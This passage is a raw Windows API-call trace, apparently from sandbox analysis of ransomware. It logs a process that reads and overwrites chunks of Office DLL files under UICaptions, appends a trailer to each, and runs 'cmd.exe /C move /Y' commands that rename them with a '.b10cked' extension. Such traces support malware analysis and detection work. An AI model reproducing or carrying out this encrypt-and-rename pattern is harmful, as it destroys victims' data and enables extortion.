[0156.208] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.208] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.228] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaaf, lpOverlapped=0x0) returned 1 [0156.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.297] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.297] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xcaaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xcaaf, lpOverlapped=0x0) returned 1 [0156.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=-113327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1bab1 [0156.298] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.298] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaaf, lpOverlapped=0x0) returned 1 [0156.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=-113327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1bab1 [0156.397] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.397] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xcaaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xcaaf, lpOverlapped=0x0) returned 1 [0156.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0156.401] WideCharToMultiByte (in: CodePage=0xfde9, 
dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0156.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x37560 [0156.401] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0156.401] CloseHandle (hObject=0x114) returned 1 [0156.402] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX") returned 0x3c [0156.403] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0156.404] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C 
move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd48, dwThreadId=0x514)) returned 1 [0156.405] CloseHandle (hObject=0x110) returned 1 [0156.405] CloseHandle (hObject=0x114) returned 1 [0156.405] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.405] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.405] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0156.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.405] ReleaseMutex (hMutex=0xf8) returned 1 [0156.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.405] ReleaseMutex (hMutex=0xf8) returned 1 [0156.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.405] ReleaseMutex (hMutex=0xf8) returned 1 [0156.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.405] ReleaseMutex (hMutex=0xf8) returned 1 [0156.405] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0156.406] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21319528272) returned 1 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.406] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa6078 [0156.407] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa6560 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa6560 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.451] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.451] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.534] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.594] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0156.596] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.596] WriteFile 
(in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.597] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.597] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0156.597] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0156.597] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.717] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.718] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0156.720] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0156.720] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.720] WriteFile (in: 
hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.721] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0156.721] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x86560 [0156.721] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.744] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.745] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0156.746] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x86560 [0156.746] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.746] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.747] WriteFile (in: 
hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0156.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0156.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0156.750] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa6560 [0156.750] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0156.750] CloseHandle (hObject=0x114) returned 1 [0156.941] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX") returned 0x3c [0156.942] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0156.943] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xd3c, dwThreadId=0xe44)) returned 1 [0156.945] CloseHandle (hObject=0x1b4) returned 1 [0156.945] CloseHandle (hObject=0x114) returned 1 [0156.945] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.945] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.945] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0156.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.945] ReleaseMutex (hMutex=0xf8) returned 1 [0156.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.945] ReleaseMutex (hMutex=0xf8) returned 1 [0156.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 
[0156.945] ReleaseMutex (hMutex=0xf8) returned 1 [0156.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.945] ReleaseMutex (hMutex=0xf8) returned 1 [0156.945] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 